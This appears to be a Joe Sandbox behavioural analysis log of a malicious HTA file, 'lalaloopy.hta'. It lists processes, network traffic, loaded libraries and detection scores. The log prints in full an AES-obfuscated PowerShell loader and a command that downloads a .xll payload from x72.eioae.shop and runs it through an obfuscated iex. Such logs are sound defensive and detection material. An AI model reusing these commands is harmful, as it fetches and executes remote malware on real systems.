    Source: Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.1330449219.00000000077BD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.1324634945.00000000030C2000.00000004.00000020.00020000.00000000.sdmp
    Source: global trafficTCP traffic: 192.168.2.6:55948 -> 1.1.1.1:53
    Source: global trafficHTTP traffic detected: GET /413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll HTTP/1.1Host: x72.eioae.shopConnection: Keep-Alive
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll HTTP/1.1Host: x72.eioae.shopConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: x72.eioae.shop
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 16:35:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 191Connection: closeX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffSet-Cookie: connect.sid=s%3AEGlKEJFr08qFjFo4btUm5-Lb9kzuQn1t.NwuQgd8tK6F%2FpRmEZYs7XSDxFf3Wqec6%2BlK0S7X87uU; Path=/; HttpOnlycf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oM71qvLVRJqkuajHY3kH6i478HYgU%2FywtxKamo9BLNJkKXFUYjytKqnISDmK2KSPrR1%2F4yTCYX3T6YmQUmVZssQ1qVPvHa3gybUvgCnhCppEkg%2FMlHJ0GA2ArSvLHw8fhQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}speculation-rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 91e43a23e8046b15-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7787&min_rtt=7090&rtt_var=2616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=730&delivery_rate=407944&cwnd=204&unsent_bytes=0&cid=39929fb1b7f4b80d&ts=828&x=0"
    Source: powershell.exe, 00000001.00000002.1296975221.00000000059F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000001.00000002.1292385003.0000000004AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000001.00000002.1292385003.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1326478181.0000000004FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000001.00000002.1292385003.0000000004AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000006.00000002.1326478181.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x72.eioae.shop
    Source: powershell.exe, 00000001.00000002.1292385003.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1326478181.0000000004FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000001.00000002.1296975221.00000000059F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000001.00000002.1296975221.00000000059F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000001.00000002.1296975221.00000000059F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000001.00000002.1292385003.0000000004AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000001.00000002.1292385003.0000000004BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000001.00000002.1296975221.00000000059F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000001.00000002.1292385003.0000000004BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://x72.eioae
    Source: powershell.exe, 00000006.00000002.1326478181.0000000005322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://x72.eioae.
    Source: powershell.exe, 00000006.00000002.1326478181.0000000005212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://x72.eioae.shop
    Source: powershell.exe, 00000001.00000002.1290736699.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://x72.eioae.shop/413a42a4
    Source: powershell.exe, 00000006.00000002.1324634945.0000000003008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll
    Source: powershell.exe, 00000001.00000002.1292385003.0000000004BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://x72.eioaehZ4k
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
    Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
    Source: unknownHTTPS traffic detected: 172.67.173.214:443 -> 192.168.2.6:49687 version: TLS 1.2
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
    Source: classification engineClassification label: mal76.evad.winHTA@7/7@1/1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2280:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wiesp1wq.h1u.ps1Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: lalaloopy.htaVirustotal: Detection: 28%
    Source: lalaloopy.htaReversingLabs: Detection: 18%
    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\lalaloopy.hta"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3)Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'') Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: .pdb8 source: powershell.exe, 00000006.00000002.1330449219.00000000077A5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1330449219.00000000077A5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.1324634945.00000000030C2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000006.00000002.1330203482.000000000776E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.1324634945.000000000303B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.1330449219.00000000077BD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.1324634945.00000000030C2000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Suspicious powershell command line found
